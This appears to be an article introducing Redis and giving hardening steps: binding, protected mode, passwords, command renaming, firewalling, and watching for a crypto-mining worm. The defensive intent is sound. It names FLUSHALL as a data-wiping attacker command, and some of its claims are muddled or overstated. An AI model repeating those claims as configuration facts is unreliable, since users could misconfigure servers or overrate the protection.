Derived from the phrase Remote Dictionary Server, Redis is an in-memory data structure project that implements a distributed, in-memory key-value database with flexible durability. Redis can be introduced between a web application and database as a ‘Cache’ to store the responses from the database in key-value pairs, thereby, reducing database calls and server load.
These key-value pairs are implemented in the memory, i.e., RAM of the server, which makes it a thousand times faster than accessing a hard disk but is costlier to implement. It offers value as per the key requested by the application—if the key is not present in Redis, then it sends queries to the database and stores the results for further requests.
Redis supports multiple data structures, like string, list, set, sorted set, hash table, HyperLogLog, bitmap, stream, and spatial index. It is used by many famous brands like Netflix, Twitter, Amazon, and Microsoft. According to Shodan.io, Redis is implemented on more than five lakhs servers worldwide.
Many industries like gaming, financial services, healthcare, and IT are using Redis for solving their business problems. Developers integrate Redis with Apache Solr for reflecting product inventory updates quickly with the help of Redis’ in-memory store capability.
Redis’ Publisher/Subscriber (Pub/Sub) or Message Broker ability helps in building the foundation of microservices architecture. It helps in decoupling the services and makes their communication more effective. Redis can be used in geospatial apps for processing and analyzing geospatial data in real-time. It can be used to create chat systems and social networking sites.
Companies like Uber and Tinder are leveraging their Pub/Sub capabilities in creating their fault-tolerant and highly available architecture. The back-end infrastructure of Tinder relies on Redis-based caching to fulfill the requests generated by more than 2 billion users of the Swipe feature per day and hosts more than 30 billion matches to 190 countries globally.
To ensure all security loopholes are plugged, an organization must take the following measures:
Since Redis has no default authentication, It does not support encryption. All data is stored in cleartext. An attacker can use FLUSHALL command to delete all key-value data sets. To protect the Redis server, update the configuration file as mentioned below:
Path of the config file -> /etc/redis/redis.conf
# bind 127.0.0.1
It will only accept client connections made to localhost. (Private mode)
# bind 0.0.0.0
It will accept all connections made to any address. (Public mode)
Running Redis with a root user dramatically increases the potential damage that an attacker can cause if the session is hijacked. It is better to run it as an unprivileged Redis user for a specific purpose, since the root user has access to ‘sudo’ commands that can be utilized to change the system configuration, such as ‘start/stop’ a service.
Restrict traffic coming from the outside world, except the trusted clients, to the internal network with the help of firewall rules. If no communication is required from the network outside, then disallow the incoming traffic to the port 6379 with the help of network access control lists. If not, the information saved on Redis would be accessible to external applications.
It is recommended to use the protected mode when Redis is executed with the default configuration (binding all the interfaces) and without any password. In this mode, Redis only replies to the loopback address and replies with an error to the clients connecting from any other address. Uncomment the following line in the configuration file to use Redis in a protected mode.
# Protected-mode yes
Since it is stored inside the redis.conf file, Redis password can be very long. Ensure that the password is strong and lengthy to stand against the Brute-force attacks — around 150K passwords can be tested per second by a password cracking tool against the Redis server. To add a password authentication to Redis, uncomment the following line in the configuration file and change the password in front of it.
# requirepass foobared
Like every other Redis command, the AUTH command is sent unencrypted that can leverage an attacker to have enough network access for eavesdropping (network sniffing). In such a scenario, we can use SSL proxy to encrypt the traffic, which comes with a performance tradeoff.
Always monitor the processes/CPU consumption on servers to check for the presence of any crypto-mining malware, as in the case of RedisWannaMine worm.The worm downloads mining malware and gains persistence by creating a new cron job. This script steals the computing power of the victim’s machine to mine for cryptocurrencies, like Bitcoin.
Change the name of administrating commands at your discretion. For example, CONFIG command can be changed into something hard to guess in a shared environment so that it will still be recognizable for the internal user/tools but not for anyone outside the team.
In the configuration file, uncomment the below and add any keyword in place of “…”
# rename-command CONFIG "…"
Redis Enterprise is a robust in-memory database platform built on an open-source Redis with additional features like auto-failover, auto-sharding /scaling, easy backups, and disaster recovery capabilities.
Along with these resilient features, it also provides many other security features related to authentication and authorization. Some of the security features are mentioned below:
With Redis Enterprise Cloud, the data access can be secured by IP filtering. It allows eligible application servers from a given source of IPs to authenticate the database.
Security has become an inseparable part of the process while developing and deploying applications in the systems. While designing a cloud infrastructure, we need to implement security at the network level as well as at the application implementation level. The goal is to implement the Redis server while minimizing the attack surface to the least. After taking every measure to harden the Redis server, it should be impenetrable for the hackers to attack. If there is a single chance of vulnerability in the system design, the whole system gets compromised.
They say that “everything comes with a cost.” While securing an application has a minor influence on its performance, it’s recommended to run benchmark tests on the application with & without encryption to determine the performance impact. Since there is no single model of implementation and that every industry has itsuse case, it’s crucial to have a comprehensive cloud security strategy in place.